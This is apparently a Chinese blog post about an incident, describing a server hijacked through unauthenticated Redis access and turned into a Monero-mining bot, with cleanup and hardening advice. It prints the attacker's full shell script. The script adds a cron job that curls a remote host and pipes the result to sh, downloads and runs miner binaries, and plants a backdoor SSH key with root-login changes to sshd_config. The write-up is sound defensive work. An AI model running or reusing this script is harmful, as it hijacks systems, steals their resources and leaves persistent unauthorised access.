Redis未受权访问缺陷让服务器沦为肉鸡

朋友的一个项目说接到阿里云的告警，提示服务器已沦为肉鸡，网络带宽被大量占用，网站访问很慢，经过SSH远程管理服务器还频繁断开连接。应朋友的邀请，我便参与了此次事件的处理全过程：

阿里云的安全告警邮件内容：


 

在没有查到异常进程以前我是先把操做系统的带宽&端口用iptables 作了限制这样能保证我能远程操做服务器才能查找缘由.



在各类netstat –ntlp  的查看下没有任何异常。在top 下查到了有异常进程 还有些异常的这里就截图一个：

 

结果果断把进程给kill -9  了  没想到再去ps的时候又来了 意思就是会自动启动它。
这就让我想到了crond 这个自动任务果不其然 /var/sprool/cron/root 这个文件被人作了手脚 并且是二进制的，果断又给删除了，觉得这下没事告终果过了
两分钟这个文件又来这个就引发我主要了联想到了是否是有说明守护进程了 这样的事情确定是有守护进程在才会发生的了。因而我去百度了下  jyam -c x -M stratum+tcp 果不其然 确实有这样的攻击，这个攻击是因为redis 未受权登录漏洞引发致使黑客利用的。

漏洞概述

Redis 默认状况下，会绑定在 0.0.0.0:6379，这样将会将Redis服务暴露到公网上，若是在没有开启认证的状况下，能够致使任意用户在能够访问目标服务器的状况下未受权访 问Redis以及读取Redis的数据。攻击者在未受权访问Redis的状况下能够利用Redis的相关方法，能够成功将本身的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中，进而能够直接登陆目标服务器。

漏洞描述

Redis 安全模型的观念是: “请不要将Redis暴露在公开网络中, 由于让不受信任的客户接触到Redis是很是危险的” 。
Redis 做者之因此放弃解决未受权访问致使的不安全性是由于, 99.99%使用Redis的场景都是在沙盒化的环境中, 为了0.01%的可能性增长安全规则的同时也增长了复杂性, 虽然这个问题的并非不能解决的, 可是这在他的设计哲学中还是不划算的。
由于其余受信任用户须要使用Redis或者由于运维人员的疏忽等缘由，部分Redis 绑定在0.0.0.0:6379，而且没有开启认证（这是Redis的默认配置），若是没有进行采用相关的策略，好比添加防火墙规则避免其余非信任来源 ip访问等，将会致使Redis服务直接暴露在公网上，致使其余用户能够直接在非受权状况下直接访问Redis服务并进行相关操做。利用Redis自身的相关方法，能够进行写文件操做，攻击者能够成功将本身的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中，进而能够直接登陆目标服务器。  （致使能够执行任何操做）

漏洞影响

Redis 暴露在公网（即绑定在0.0.0.0:6379，目标IP公网可访问），而且没有开启相关认证和添加相关安全策略状况下可受影响而致使被利用。

在网上我查到这个被黑客编译成二进制的源文件代码 (关于redis 未受权登录安全措施：

1 配置bind选项, 限定能够链接Redis服务器的IP, 并修改redis的默认端口6379. 防火墙控制好容许IP链接就好

2 配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

3 配置rename-command CONFIG "RENAME_CONFIG", 这样即便存在未受权访问, 也可以给攻击者使用config指令加大难度

4是Redis做者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如config

)

##网上查到脚本内容大体以下

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool/cron/root

# echo "*/2 * * * * ps auxf | grep -v grep | grep yam || /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr" >> /var/spool/cron/root

echo "*/5 * * * * ps auxf | grep -v grep | grep gg3lady || nohup /opt/gg3lady &" >> /var/spool/cron/root 

ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr &

if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then

         mkdir -p ~/.ssh

         rm -f ~/.ssh/authorized_keys*

         echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq

         echo "PermitRootLogin yes" >> /etc/ssh/sshd_config

         echo "RSAAuthentication yes" >> /etc/ssh/sshd_config

         echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config

         echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config

         /etc/init.d/sshd restart

fi 

if [ ! -f "/opt/yam/yam" ]; then

         mkdir -p /opt/yam

         curl -f -L https://r.chanstring.com/api/download/yam -o /opt/yam/yam

         chmod +x /opt/yam/yam

         # /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr

fi

if [ ! -f "/opt/gg3lady" ]; then

         curl -f -L https://r.chanstring.com/api/download/gg3lady_`uname -i` -o /opt/gg3lady

         chmod +x /opt/gg3lady

fi

# yam=$(ps auxf | grep yam | grep -v grep | wc -l)

# gg3lady=$(ps auxf | grep gg3lady | grep -v grep | wc -l)

# cpu=$(cat /proc/cpuinfo | grep processor | wc -l) 

# curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg3lady=$gg3lady\&arch=`uname -i`

因而终于找到源头了，

下面咱们来分析下这个脚本

整个脚本的大体就这样

处理方法只要把 /var/spool/cron/root 删除   /opt/yam/yam   删除   /opt/gg3lady  删除  .ssh/KHK75NEOiq 删除把gg3lady  yam     进程结束 还有就是sshd_confg 文件还原 应该就没问题了。可是为了安全起见仍是但愿重装服务器，不确保别人不留其余的漏洞

对应的安全处理：
一、限制Redis的访问IP，如指定本地IP获指定特定IP能够访问。
二、若是是本地访问和使用，打开防火墙（阿里云等操做系统，默认把防火墙关了），不开放Redis端口，最好修改掉Redis的默认端口；
三、若是要远程访问，给Redis配置上受权访问密码；

 本文技术支持：龙果学院 www.roncoo.com